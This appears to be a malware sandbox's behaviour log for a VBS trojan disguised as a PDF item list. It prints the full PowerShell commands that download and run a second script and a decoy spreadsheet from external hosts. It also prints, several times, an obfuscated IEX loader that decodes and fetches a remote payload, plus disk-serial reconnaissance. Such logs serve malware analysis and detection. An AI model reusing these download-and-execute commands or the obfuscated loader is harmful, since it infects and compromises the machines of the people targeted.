            Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@19/18@3/6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\tk4f2qxkb.vbsJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4260:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2948:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4pxuyyh.zlo.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4352
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6364
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\tk4f2qxkb.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $Ree
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $Ree
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\bsxhli2ob.xlsx"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 8192
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\tk4f2qxkb.vbs" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\bsxhli2ob.xlsx"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $ReeJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 8192Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp140.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
